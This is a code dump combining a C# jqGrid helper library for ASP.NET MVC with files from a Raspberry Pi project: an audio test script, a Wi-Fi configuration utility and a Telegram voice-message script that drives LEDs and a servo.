private string _customfunc;
/// <summary>
/// 构造
/// </summary>
/// <param name="required"></param>
/// <param name="edithidden">只在Form Editing模式下有效,设置为true,就可以让隐藏字段也可以修</param>
/// <param name="number">设置为true,如果输入值不是数字或者为空,则会报错</param>
/// <param name="integer"> 是否整数</param>
/// <param name="minValue">最小值</param>
/// <param name="maxValue">最大值</param>
/// <param name="email">是否合法的邮件</param>
/// <param name="url">检查是不是合法的URL地址</param>
/// <param name="date">设置为true,输入内容格式需要满足日期格式要求(使用ISO格式,”Y-m-d“),否则将会显示一个错误信息。</param>
/// <param name="time">设置为true,输入内容格式需要满足时间格式要求,否则将会显示一个错误信息。 目前仅支持”hh:mm“和后接可选的 am/pm 时间格式</param>
/// <param name="customfun">函数名,函数需要返回一个数组包含以下项目 第一项:true/false,指定验证是否成功 第二项:当第一项为false有效,显示给用户的错误信息。 格式如:[false,”Please enter valid value”]</param>
public EditRules(bool required=false,bool edithidden=false, bool number = false, bool integer = false, double? minValue = null ,double? maxValue=null,bool email=false, bool url= false, bool date= false, bool time= false, string customfun=null)
{
Required = required;
Edithidden = edithidden;
Number = number;
Integer = integer;
MinValue = minValue;
MaxValue = maxValue;
Email = email;
Url = url;
Date = date;
Time = time;
CustomFunc = customfun;
}
/// <summary>
/// 设置编辑的时候是否可以为空(是否是必须的)。
/// </summary>
[JsonProperty("required")]
public bool Required { get; set; }
/// <summary>
/// 只在Form Editing模式下有效,设置为true,就可以让隐藏字段也可以修
/// </summary>
[JsonProperty("edithidden")]
public bool Edithidden { get; set; }
/// <summary>
/// 设置为true,如果输入值不是数字或者为空,则会报错
/// </summary>
[JsonProperty("number")]
public bool Number { get; set; }
/// <summary>
/// 是否整数
/// </summary>
[JsonProperty("integer")]
public bool Integer { get; set; }
/// <summary>
/// 最小值
/// </summary>
[JsonProperty("minValue")]
public double? MinValue { get; set; }
/// <summary>
/// 最大值
/// </summary>
[JsonProperty("maxValue")]
public double? MaxValue { get; set; }
/// <summary>
/// 是否合法的邮件
/// </summary>
[JsonProperty("email")]
public bool Email { get; set; }
/// <summary>
/// 检查是不是合法的URL地址
/// </summary>
[JsonProperty("url")]
public bool Url { get; set; }
/// <summary>
/// 设置为true,输入内容格式需要满足日期格式要求(使用ISO格式,”Y-m-d“),否则将会显示一个错误信息。
/// </summary>
[JsonProperty("date")]
public bool Date { get; set; }
/// <summary>
/// 设置为true,输入内容格式需要满足时间格式要求,否则将会显示一个错误信息。 目前仅支持”hh:mm“和后接可选的 am/pm 时间格式
/// </summary>
[JsonProperty("time")]
public bool Time { get; set; }
/// <summary>
///
/// </summary>
[JsonProperty("custom")]
internal bool Custom { get; set; }
/// <summary>
/// 函数需要返回一个数组包含以下项目 第一项:true/false,指定验证是否成功 第二项:当第一项为false有效,显示给用户的错误信息。 格式如:[false,”Please enter valid value”]
/// </summary>
[JsonProperty("custom_func")]
public string CustomFunc {
get
{
return _customfunc;
}
set
{
if (!string.IsNullOrEmpty(value))
{
Custom = true;
_customfunc = value;
}
}
}
}
}
/*
Edithidden:只在Form Editing模式下有效,设置为true,就可以让隐藏字段也可以修改。
required:设置编辑的时候是否可以为空(是否是必须的)。
Number:设置为true,如果输入值不是数字或者为空,则会报错。
Integer:是否整数
minValue:最大值
maxValue:最小值
Email:是否合法的邮件
Url:检查是不是合法的URL地址。
date:
time:
custom:设置为true,则会通过一个自定义的js函数来验证。函数定义在custom_func中。
custom_func:传递给函数的值一个是需要验证value
*/
<file_sep>namespace HalowerHub.JqGrid
{
/// <summary>
///
/// </summary>
public class RenderInitCommand
{
/// <summary>
/// 表格Id
/// </summary>
public string GridId { get; set; }
/// <summary>
///
/// </summary>
public string TableInitCommand { get; set; }
/// <summary>
/// 底部按钮初始化
/// </summary>
public string BottomNavBarInitCommand { get; set; }
/// <summary>
/// 表头合并初始化
/// </summary>
public string GroupHeaderInitCommand { get; set; }
/// <summary>
/// 合并行初始化
/// </summary>
public string MergerColumnInitCommand { get; set; }
/// <summary>
/// 分页Id
/// </summary>
public string PagerId { get; set; }
}
}<file_sep>/****************************************************
** ���ߣ� Halower (QQ:121625933)
** ��ʼʱ�䣺2015-02-01
** ������jqGrid��չö��
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnSearchs
{
Text,
Select
}
}<file_sep>using System.Collections.Generic;
using System.Web.Mvc;
using HalowerHub.JqGrid;
using JQgridTest.Models;
namespace JQgridTest.Controllers
{
public class HomeController : Controller
{
// GET: Home
public ActionResult Index()
{
return View();
}
public ContentResult PersonListData()
{
var persons = new List<Person>
{
new Person {Id = 1, Name = " 小1", Password = "<PASSWORD>"},
new Person {Id = 2, Name = "小2", Password = "<PASSWORD>"},
new Person {Id = 3, Name = "小3", Password = "<PASSWORD>"},
new Person {Id = 4, Name = "小4", Password = "<PASSWORD>"},
new Person {Id = 5, Name = "小5", Password = "<PASSWORD>"}
};
return Content(persons.Pagination(this));
}
}
}<file_sep># JqGridForMvc
JqGridForMvc is most simple and popular JqGrid plugin that can be used to quickly create a commercial request form. We are also pursuing: "write less, do more", if you have any questions or help with it you can send email to me or contact me
# Installation
``` Install-Package HalowerHub.Jqgrid```
# Sample Code

Here is a simple example, but JqgridForMvc has supported the most common Jqgrid operation, there is time to do supplementary examples
```
@model UserDto
@{
var g = Html.JqGridKit();
}
<div class="row" style="margin-top: 10px">
@(
g.JqGrid("userlistGrid", g.Param(p => p.Id)).MainGrid(
g.GridColumn(x => x.Id, 300),
g.GridColumn(x => x.UserName, 300).Searchable(),
g.GridColumn(x => x.PhoneNumber, 300).Searchable(),
g.GridColumn("options",150, "custom html fragment")
)
.Caption("user grid").Height("150")
.Url(Url.Action("UserListData", "Account")).Multiselect()
.Pager().PerClearCache().MultiSearch().AutoWidth()
.BuiltInOperation(GridOperators.Refresh | GridOperators.Search | GridOperators.Add)
)
</div>
```
or:SubGrid

#back-end -code(Only a word)
```
public ContentResult UserListData()
{
return Content(dataSource.Pagination(this));
}
```
<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展枚举
*****************************************************/
namespace HalowerHub.JqGrid
{
public enum ColumnEdits
{
Text,
Textarea,
Select,
Checkbox,
Password,
Button,
Image,
File
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-03-21
** 描述:jqGrid查询扩展
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public static class SerializerToolKit
{
public static string IgnoreNullSerialize(this object result)
{
return JsonConvert.SerializeObject(result,
new JsonSerializerSettings {NullValueHandling = NullValueHandling.Ignore});
}
public static string ToSerializer(this object result)
{
return JsonConvert.SerializeObject(result);
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-03-21
** 描述:jqGrid查询扩展
*****************************************************/
namespace HalowerHub.JqGrid
{
public static class GridExtensions
{
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory<TModel> factory, string gridId)
{
return new GridGenerator<TModel>(gridId);
}
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory<TModel> factory, string gridId, string gridKey)
{
return new GridGenerator<TModel>(gridId, new GridConfiguration {GridKey = gridKey});
}
public static GridGenerator<TModel> JqGrid<TModel>(this GridFacotory factory, string gridId,GridConfiguration jqGridConfiguration)
{
return new GridGenerator<TModel>(gridId, jqGridConfiguration);
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展构造列
*****************************************************/
using System;
using System.Collections.Generic;
using System.Reflection;
namespace HalowerHub.JqGrid
{
/// <summary>
/// IList排序类
/// </summary>
public class GridListSort<T>
{
private Dictionary<string, Func<PropertyInfo, T, T, int>> dicts = new Dictionary<string, Func<PropertyInfo,T,T, int>>();
/// <summary>
/// 构造函数
/// </summary>
/// <param name="propertyName">排序字段属性名</param>
/// <param name="isAsc">true升序 false 降序 不指定则为true</param>
public GridListSort(string propertyName, bool isAsc)
{
PropertyName = propertyName;
IsAsc = isAsc;
dicts.Add("Int32", CompareInt);
dicts.Add("Double", CompareDouble);
dicts.Add("String", CompareString);
dicts.Add("DateTime", CompareDateTime);
dicts.Add("Decimal", CompareDecimal);
}
/// <summary>
/// 构造函数
/// </summary>
/// <param name="propertyName">排序字段属性名</param>
public GridListSort(string propertyName)
{
PropertyName = propertyName;
IsAsc = true;
}
private string PropertyName { get; }
private bool IsAsc { get; }
#region 比较器
public int CompareInt(PropertyInfo prop, T x, T y)
{
var int1 = 0;
var int2 = 0;
if (prop.GetValue(x, null) != null)
{
int1 = Convert.ToInt32(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
int2 = Convert.ToInt32(prop.GetValue(y, null));
}
return IsAsc ? int2.CompareTo(int1) : int1.CompareTo(int2);
}
public int CompareDouble(PropertyInfo prop, T x, T y)
{
double double1 = 0;
double double2 = 0;
if (prop.GetValue(x, null) != null)
{
double1 = Convert.ToDouble(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
double2 = Convert.ToDouble(prop.GetValue(y, null));
}
return IsAsc ? double2.CompareTo(double1) : double1.CompareTo(double2);
}
public int CompareDecimal(PropertyInfo prop, T x, T y)
{
decimal decimal1 = 0m;
decimal decimal2 = 0m;
if (prop.GetValue(x, null) != null)
{
decimal1 = Convert.ToDecimal(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
decimal2 = Convert.ToDecimal(prop.GetValue(y, null));
}
return IsAsc ? decimal2.CompareTo(decimal1) : decimal1.CompareTo(decimal2);
}
public int CompareString(PropertyInfo prop, T x, T y)
{
var string1 = string.Empty;
var string2 = string.Empty;
if (prop.GetValue(x, null) != null)
{
string1 = prop.GetValue(x, null).ToString();
}
if (prop.GetValue(y, null) != null)
{
string2 = prop.GetValue(y, null).ToString();
}
return IsAsc ? string.Compare(string2, string1, StringComparison.Ordinal) : string.Compare(string1, string2, StringComparison.Ordinal);
}
public int CompareDateTime(PropertyInfo prop, T x, T y)
{
var dateTime1 = DateTime.Now;
var dateTime2 = DateTime.Now;
if (prop.GetValue(x, null) != null)
{
dateTime1 = Convert.ToDateTime(prop.GetValue(x, null));
}
if (prop.GetValue(y, null) != null)
{
dateTime2 = Convert.ToDateTime(prop.GetValue(y, null));
}
return IsAsc ? dateTime2.CompareTo(dateTime1) : dateTime1.CompareTo(dateTime2);
}
#endregion
/// <summary>
/// 比较大小 返回值 小于零则X小于Y,等于零则X等于Y,大于零则X大于Y
/// </summary>
/// <param name="x"></param>
/// <param name="y"></param>
/// <returns></returns>
public int Compare(T x, T y)
{
var property = typeof (T).GetProperty(PropertyName);
var propName = property.PropertyType.Name;
if (dicts.ContainsKey(propName))
{
var action = dicts[propName];
return action.Invoke(property,x,y);
}
return 0;
}
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展表格配置信息
*****************************************************/
using System.Collections.Generic;
using System.Linq;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridConfiguration
{
#region 构造函数
public GridConfiguration(params GridColumn[] gridColumns)
{
ColSPanConfiguation = new ColSPanConfiguation();
GridOperation = new GridOperation();
var columns = new List<IGridColumn>();
columns.AddRange(gridColumns);
GridColumns = columns;
}
#endregion
#region 字段
private string _dataType;
private string _mType;
private string _pagerId;
private int[] _rowList;
private int? _rowNum;
private bool? _viewRecords;
#endregion
#region 属性
[JsonProperty("url")]
public string Url { get; set; }
[JsonProperty("datatype")]
public string DataType
{
get { return _dataType ?? "json"; }
set { _dataType = value; }
}
[JsonProperty("colNames")]
public string[] ColNames
{
get { return GridColumns.ToList().Select(c => c.DisplayName).ToArray(); }
}
[JsonProperty("colModel")]
public List<IGridColumn> GridColumns { get; set; }
[JsonProperty("rowNum")]
public int RowNum
{
get { return _rowNum ?? 10; }
set { _rowNum = value; }
}
[JsonProperty("rowList")]
public int[] RowList
{
get { return _rowList ?? new[] {10, 20, 30}; }
set { _rowList = value; }
}
[JsonProperty("pager")]
public string PagerId
{
get { return !string.IsNullOrEmpty(_pagerId) ? "#" + _pagerId : null; }
set { _pagerId = value; }
}
[JsonProperty("sortname")]
public string SortName { get; set; }
[JsonProperty("mtype")]
public string MTyope
{
get { return _mType ?? "post"; }
set { _mType = value; }
}
/// <summary>
/// 是否在浏览导航栏显示记录总数
/// </summary>
[JsonProperty("viewrecords")]
public bool ViewRecords
{
get { return _viewRecords ?? true; }
set { _viewRecords = value; }
}
[JsonIgnore]
public ColSPanConfiguation ColSPanConfiguation { get; set; }
/// <summary>
/// 从服务器读取XML或JSON数据时初始的排序类型
/// </summary>
[JsonProperty("sortorder")]
public string Sortorder { get; set; }
[JsonProperty("caption")]
public string Caption { get; set; }
[JsonProperty("direction")]
public string Direction { get; set; }
[JsonProperty("loadtext")]
public string LoadText { get; set; }
[JsonProperty("pginput")]
public bool PgInput { get; set; }
[JsonProperty("postData")]
public Dictionary<string, string> PostData { get; set; }
[JsonProperty("autowidth")]
public bool AutoWidth { get; set; }
[JsonProperty("autoencode")]
public bool? AutoEencode { get; set; }
[JsonProperty("emptyrecords")]
public string EmptyRecords { get; set; }
[JsonProperty("height")]
public string Height { get; set; }
[JsonProperty("multiselect")]
public bool Multiselect { get; set; }
[JsonIgnore]
public GridOperation GridOperation { get; set; }
[JsonIgnore]
public bool MultiSearch { get; set; }
[JsonProperty("gridComplete")]
public string GridComplete { get; set; }
#region 子表格
[JsonProperty("subGrid")]
public bool? SubGrid { get; set; }
[JsonProperty("subGridModel")]
public SubGridTable[] SubGridModel { get; set; }
[JsonProperty("subGridType")]
public object SubGridType { get; set; }
[JsonProperty("subGridUrl")]
public string SubGridUrl { get; set; }
[JsonIgnore]
public bool GroupHeaders { get; set; }
[JsonIgnore]
public string GridKey { get; set; }
[JsonProperty("subGridRowExpanded")]
public string SubGridRowExpanded { get; set; }
[JsonIgnore]
public bool PerClearCache { get; set; }
[JsonProperty("treeGrid")]
public bool TreeGrid { get; set; }
[JsonProperty("treeGridModel")]
public string TreeGridModel { get; set; }
public string ExpandColumn { get; internal set; }
[JsonProperty("treeIcons")]
public string TreeIcons { get; internal set; }
[JsonProperty("tree_root_level")]
public string TreeRootLevel { get; internal set; }
[JsonProperty("editurl")]
public string EditUrl { get; internal set; }
[JsonProperty("onSelectRow")]
public string OnSelectRow { get; internal set; }
[JsonProperty("onSelectAll")]
public string OnSelectAll { get; internal set; }
#endregion
}
#endregion
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展单元格操作配置类
*****************************************************/
using System.Diagnostics;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridOperation
{
[JsonProperty("edit")]
public bool Edit { get; set; }
[JsonProperty("edittext")]
public string EditText { get; set; }
/// <summary>
///
/// </summary>
[JsonProperty("editicon")]
public string Editicon { get; set; } = "ui-icon ui-icon-pencil";
[JsonProperty("add")]
public bool Add { get; set; }
[JsonProperty("addtext")]
public string AddText { get; set; }
/// <summary>
/// Delicon
/// </summary>
[JsonProperty("addicon")]
public string Addicon { get; set; } = "ui-icon ui-icon-plus";
/// <summary>
///
/// </summary>
[JsonProperty("del")]
public bool Delete { get; set; }
/// <summary>
///
/// </summary>
[JsonProperty("deltext")]
public string DeleteText { get; set; }
/// <summary>
///
/// </summary>
[JsonProperty("delicon")]
public string Delicon { get; set; } = "ui-pg-button ui-corner-all";
[JsonProperty("search")]
public bool Search { get; set; }
[JsonProperty("searchtext")]
public string SearchText { get; set; }
[JsonProperty("searchicon")]
public string SearchIcon { get; set; } = "ui-icon ui-icon-search";
[JsonProperty("refresh")]
public bool Refresh { get; set; }
[JsonProperty("refreshText")]
public string RefreshText { get; set; }
[JsonProperty("refreshicon ")]
public string Refreshicon { get; set; } = "ui-icon ui-icon-refresh";
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-03-21
** 描述:jqGrid查询扩展
*****************************************************/
using System;
using System.Collections.Generic;
using System.Linq;
using System.Linq.Expressions;
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridRule
{
public string Field { get; set; }
public string Op { get; set; }
public string Data { get; set; }
}
public class GridFilters
{
public string GroupOp { get; set; }
public List<GridRule> Rules { get; set; }
}
public static class GridSearchPredicate
{
public static Expression<Func<T, bool>> SingleSearchExpression<T>(string searchField, string searchOper,string searchString) where T : class
{
var predicate = PredicateBuilder.True<T>();
if (string.IsNullOrEmpty(searchField)) return predicate;
var filed = typeof(T).GetProperty(searchField);
//Fix下,由于是单个查询条件所有没必要多个ifElse
switch (searchOper)
{
case "eq":
predicate =predicate.And(x => filed.GetValue(x, null).ToString() == searchString);
break;
case "bw":
predicate=predicate.And(x => filed.GetValue(x, null).ToString().StartsWith(searchString));
break;
case "cn":
predicate=predicate.And(x => filed.GetValue(x, null).ToString().Contains(searchString));
break;
case "gt":
{
if (filed.PropertyType.Name == "DateTime")
{
predicate = (x => DateTime.Parse(filed.GetValue(x, null).ToString()) > DateTime.Parse(searchString));
}
else
{
predicate = (x => decimal.Parse(filed.GetValue(x, null).ToString()) > decimal.Parse(searchString));
}
}
break;
case "lt":
{
if (filed.PropertyType.Name == "DateTime")
{
predicate = (x => DateTime.Parse(filed.GetValue(x, null).ToString()) < DateTime.Parse(searchString));
}
else
{
predicate = (x => decimal.Parse(filed.GetValue(x, null).ToString()) <decimal.Parse(searchString));
}
}
break;
default:
break;
}
return predicate;
}
public static Expression<Func<T, bool>> MultiSearchExpression<T>(string filtersContent) where T : class
{
var predicate = PredicateBuilder.True<T>();
var filters = JsonConvert.DeserializeObject<GridFilters>(filtersContent);
predicate = filters.GroupOp == "AND"
? filters.Rules.Aggregate(predicate,
(current, rule) => current.And(SingleSearchExpression<T>(rule.Field, rule.Op, rule.Data)))
: filters.Rules.Aggregate(predicate,
(current, rule) => current.Or(SingleSearchExpression<T>(rule.Field, rule.Op, rule.Data)));
return predicate;
}
}
}<file_sep>namespace HalowerHub.JqGrid
{
public enum CellTypes
{
String,
Number,
DateTime
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展单元列属性
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GridColumn : IGridColumn
{
#region 主要方法
/// <summary>
/// 设置字段映射名
/// </summary>
/// <param name="field">字段</param>
/// <param name="name">映射名</param>
/// <returns></returns>
public GridColumn(string field, string name)
{
Field = field;
DisplayName = name;
}
#endregion 主要方法
#region 字段
private string _aligin;
private string _index;
private bool? _search;
private string _fomatter;
#endregion 字段
#region 属性
[JsonProperty("name")]
public string Field { get; set; }
[JsonProperty("index")]
public string Index
{
get { return _index ?? Field; }
set { _index = value; }
}
[JsonProperty("width")]
public int? Width { get; set; }
[JsonProperty("align")]
public string Align
{
get { return _aligin ?? "left"; }
set { _aligin = value; }
}
[JsonIgnore]
public string DisplayName { get; set; }
[JsonProperty("sortable")]
public bool Sortable { get; set; }
[JsonProperty("hidden")]
public bool Hidden { get; set; }
[JsonProperty("editable")]
public bool Editable { get; set; }
[JsonProperty("search")]
public bool Search
{
get { return _search ?? false; }
set { _search = value; }
}
[JsonProperty("stype")]
public string SearchType { get; set; }
[JsonProperty("sorttype")]
public string SortType { get; set; }
[JsonProperty("edittype")]
public string EditType { get; set; }
[JsonProperty("searchoptions")]
public string Searchoptions
{
get
{
if (SearchType == "select")
return "&{dataUrl:'" + SelectDataSourceUrl + "',sopt:['eq']}&";
else
{
switch (SearchFiledType)
{
case CellTypes.String:
return "&{sopt:['eq','bw','cn']}&";
case CellTypes.Number:
return "&{sopt:['eq','lt','gt']}&";
case CellTypes.DateTime:
return @"&{sopt:['eq','lt','gt'],dataInit: function (elem) {jQuery(elem).datepicker({changeMonth: true,changeYear: true,dateFormat:'yy年mm月dd日'});}}&";
default:
return "&{sopt:['eq','bw','cn']}&";
}
}
}
}
[JsonProperty("formatter")]
public string Formatter
{
get
{
if (!string.IsNullOrEmpty(_fomatter))
return "&" + _fomatter + "&";
return null;
}
set { _fomatter = value; }
}
[JsonProperty("cellattr")]
public string CellAttr { get; set; }
[JsonIgnore]
public CellTypes SearchFiledType { get; set; }
[JsonIgnore]
public string SelectDataSourceUrl { get; internal set; }
[JsonProperty("formatoptions")]
public Formatoption Formatoptions { get; internal set; }
[JsonProperty("editoptions")]
public string Editoptions { get; internal set; }
[JsonProperty("editrules")]
public EditRules EditRule { get; set; }
#endregion 属性
}
}<file_sep>/****************************************************
** 作者: Halower (QQ:121625933)
** 创始时间:2015-02-01
** 描述:jqGrid扩展属性
*****************************************************/
using Newtonsoft.Json;
namespace HalowerHub.JqGrid
{
public class GroupHeader
{
public GroupHeader(string startColumnName, int numberOfColumns, string titleTextHtml)
{
StartColumnName = startColumnName;
NumberOfColumns = numberOfColumns;
TitleText = titleTextHtml;
}
[JsonProperty("startColumnName")]
public string StartColumnName { get; set; }
[JsonProperty("numberOfColumns")]
public int NumberOfColumns { get; set; }
[JsonProperty("titleText")]
public string TitleText { get; set; }
}
}<file_sep>using System.ComponentModel.DataAnnotations;
namespace JQgridTest.Models
{
public class Person
{
public int Id { get; set; }
[Display(Name ="姓名")]
public string Name { get; set; }
[Display(Name = "密码")]
public string Password { get; set; }
}
}
|
83550a1b02b7cad561981b549ca1a78f40d5170b
|
[
"Markdown",
"C#"
] | 39
|
C#
|
halower/JqGridForMvc
|
ad3e00ca1f4e9d9761015fe2c5411f41be7051a9
|
dfa0c8cf2d506f105ca0fa64399d78226362b58c
|
refs/heads/master
|
<file_sep>#!/bin/bash
#init led & button
echo 25 >/sys/class/gpio/export
echo out >/sys/class/gpio/gpio25/direction
echo 23 >/sys/class/gpio/export
echo in >/sys/class/gpio/gpio23/direction
#infinite loop
while [ 1 ]
do
#led ON
echo 1 >/sys/class/gpio/gpio25/value
echo "-----> Test for Raspiaudio MIC+"
echo "------Please puch on the Yellow button to continue"
amixer set Micro 50%
amixer set Master 96%
sudo alsactl store
#waiting button pressed
while [ `cat /sys/class/gpio/gpio23/value` = 1 ]; do
set i = 1
done
#led OFF
echo 0 >/sys/class/gpio/gpio25/value
#record 5s
arecord -d4 --rate=44000 /home/pi/test.wav&
#test channels L & R
speaker-test -l1 -c2 -t wav
#led BLINK
echo 1 >/sys/class/gpio/gpio25/value
sleep 1
echo 0 >/sys/class/gpio/gpio25/value
#led BLINK
echo 1 >/sys/class/gpio/gpio25/value
sleep 1
echo 0 >/sys/class/gpio/gpio25/value
echo "playing the recording"
#play record
aplay /home/pi/test.wav
echo "------------------------------------------------------------------------"
echo "Test is done to adjust speakers volume and microphone gain run: alsamixer"
exit
done
#echo 25 >/sys/class/gpio/unexport
<file_sep>//init du point d'acces wifi par écriture du fichier /etc/wpa_supplicant/wpa_supplicant.conf
// à partir de 2 fichiers :
// /boot/ssid.txt ===> ssid
// /boot/psk.txt ===> password
//
// les 2 fichiers sont supprimés avant un reboot
//
///////////////////////////////////////////////////
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main()
{
char b[1000];
int p;
int n;
p = open("/boot/WIFI.txt", O_RDONLY);
if(p == -1) exit(0);
n = read(p,b,1000);
close(p);
remove("/etc/wpa_supplicant/wpa_supplicant.conf");
p = open("/etc/wpa_supplicant/wpa_supplicant.conf", O_WRONLY+O_CREAT, 0644);
n=write(p, b, n);
close(p);
//restart service with new config
system("sudo systemctl daemon-reload");
system("sudo systemctl restart dhcpcd");
//remove("/boot/WIFI.txt");
//system("shutdown -r now");
}
<file_sep>#!//bin/bash
sleep 3
cd /home/pi/LB
/usr/bin/python3.5 /home/pi/LB/valentin.py&
sudo /usr/bin/python3.5 /home/pi/LB/initTG.py&
<file_sep>#credit to <NAME>
#!/usr/bin/python3.5
import asyncio
import time
import os
import sys
import signal
from telethon import TelegramClient, events, sync
from telethon.tl.types import InputMessagesFilterVoice
import RPi.GPIO as GPIO
from gpiozero import Servo
from time import sleep
"""
initialisation of GPIOs
"""
global recLED #led recording (mic+)
global recBUT #button recording (mic+)
global playLED #led you have a voicemail
global p
global toPlay # number of voicemail waiting
global recD # duration of recording (in half second)
global playOK # autorisation to play messages (boolean)
global playOKD # timeout(en 1/2 secondes) de l'autorisation
global motorON # motor command
global previousMotorON #was the motor on before?
global heartBeatLed #heartbeat effect on led
global motor
heartBeatLed = False
previousMotorON = False
motorON = False
playOK = False
recD = 0
playOKD = 0
toPlay = -1
playLED = 22
recLED = 25
recBUT = 23
motor = 17
"""
initialisation of GPIO leds and switch and motor
"""
GPIO.setmode(GPIO.BCM)
GPIO.setup(recLED, GPIO.OUT)
GPIO.setup(recBUT, GPIO.IN)
GPIO.setup(playLED, GPIO.OUT)
GPIO.setup(motor, GPIO.OUT)
GPIO.output(recLED, GPIO.LOW)
async def timeC():
"""
time management : duration of recording and timeout for autorization to play
"""
global playOK
global playOKD
global recD
global motorON
while True :
await asyncio.sleep(0.5)
recD = recD + 1
if playOK == True:
playOKD = playOKD - 1
if playOKD <= 0:
playOK = False
async def recTG():
"""
Send a message 'voice'
initialisation of gpio led and button
when button is pushed: recording in a separate process
that is killed when the button is released
conversion to .oga by sox
"""
global recD
global playOK
global playOKD
delay = 0.2
while True:
await asyncio.sleep(delay)
if GPIO.input(recBUT) == GPIO.LOW:
heartBeatLed = False
p.ChangeDutyCycle(100) #turns ON the REC LED
recD = 0
pid = os.fork()
if pid == 0 :
os.execl('/usr/bin/arecord','arecord','--rate=44000','/home/pi/rec.wav','')
else:
while GPIO.input(recBUT) == GPIO.LOW :
await asyncio.sleep(delay)
os.kill(pid, signal.SIGKILL)
heartBeatLed = False
#GPIO.output(recLED, GPIO.LOW)
p.ChangeDutyCycle(0) #turns OFF the REC LED
playOK = True
playOKD = 30
if recD > 1:
os.system('sudo killall sox')
os.system('/usr/bin/sox /home/pi/rec.wav /home/pi/rec.ogg')
os.rename('/home/pi/rec.ogg', '/home/pi/rec.oga')
await client.send_file(peer, '/home/pi/rec.oga',voice_note=True)
else:
#heartBeatLed = False
#GPIO.output(recLED, GPIO.LOW)
p.ChangeDutyCycle(0)
#motor uses global to turn ON the motor
async def motor():
global motorON
global motor
global previousMotorON
# Adjust the pulse values to set rotation range
min_pulse = 0.000544 # Library default = 1/1000
max_pulse = 0.0024 # Library default = 2/1000
# Initial servo position
pos = 1
test = 0
servo = Servo(17, pos, min_pulse, max_pulse, 20/1000, None)
while True:
await asyncio.sleep(0.2)
if motorON == True:
pos=pos*(-1)
servo.value=pos
await asyncio.sleep(2)
else :
#put back in original position
servo.value=0
#detach the motor to avoid glitches and save energy
servo.detach()
previousMotorON = False
#this is the les that mimic heartbeat when you have a voicemail waiting
async def heartBeat():
global heartBeatLed
global p
p = GPIO.PWM(recLED, 500) # set Frequece to 500Hz
p.start(100) # Start PWM output, Duty Cycle = 0
while True:
if heartBeatLed == True :
for dc in range(0, 20, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
for dc in range(20, -1, -2): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.005)
time.sleep(0.05)
for dc in range(0, 101, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc) # Change duty cycle
await asyncio.sleep(0.01)
for dc in range(100, -1, -2): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
await asyncio.sleep(0.06)
for dc in range(0,8, 2): # Increase duty cycle: 0~100
p.ChangeDutyCycle(dc) # Change duty cycle
await asyncio.sleep(0.01)
for dc in range(7, -1, -1): # Decrease duty cycle: 100~0
p.ChangeDutyCycle(dc)
await asyncio.sleep(0.01)
await asyncio.sleep(1)
else :
await asyncio.sleep(0.1)
async def playTG():
"""
when authorized to play (playOK == True)
play one or several messages waiting (file .ogg) playLED on
message playing => playing
last message waiting => toPlay
"""
global toPlay
global playOK
global motorON
global heartBeatLed
global servo
playing = 0
while True:
if toPlay >= 0:
GPIO.output(playLED, GPIO.HIGH)
motorON = True
heartBeatLed = True
else:
GPIO.output(playLED, GPIO.LOW)
motorON = False
heartBeatLed = False
if (toPlay >= 0) and (playOK == True):
while playing <= toPlay:
name = '/home/pi/play' + str(playing) + '.ogg'
os.system('sudo killall vlc')
pid = os.fork()
if pid == 0 :
os.execl('/usr/bin/cvlc', 'cvlc', name, '--play-and-exit')
#os.execl('/usr/bin/cvlc', 'cvlc', name, ' vlc://quit')
os.wait()
playing = playing + 1
if playing <= toPlay :
await asyncio.sleep(1)
playing = 0
toPlay = -1
playOk = True
playOKD = 30
await asyncio.sleep(0.2)
"""
initialization of the application and user for telegram
init of the name of the correspondant with the file /boot/PEER.txt
declaration of the handler for the messages arrival
filtering of message coming from the correspondant
download of file .oga renamed .ogg
"""
GPIO.output(playLED, GPIO.HIGH)
motorON=True
api_id = 592944
api_hash = 'ae06a0f0c3846d9d4e4a7065bede9407'
client = TelegramClient('session_name', api_id, api_hash)
asyncio.sleep(2)
client.connect()
if not client.is_user_authorized():
while os.path.exists('/home/pi/phone') == False:
pass
f = open('/home/pi/phone', 'r')
phone = f.read()
f.close()
os.remove('/home/pi/phone')
print(phone)
asyncio.sleep(2)
client.send_code_request(phone,force_sms=True)
while os.path.exists('/home/pi/key') == False:
pass
f = open('/home/pi/key', 'r')
key = f.read()
f.close()
print (key)
os.remove('/home/pi/key')
asyncio.sleep(2)
me = client.sign_in(phone=phone, code=key)
GPIO.output(playLED, GPIO.LOW)
motorON=False
p = open('/boot/PEER.txt','r')
peer = p.readline()
if peer[-1] == '\n':
peer = peer[0:-1]
#print(peer)
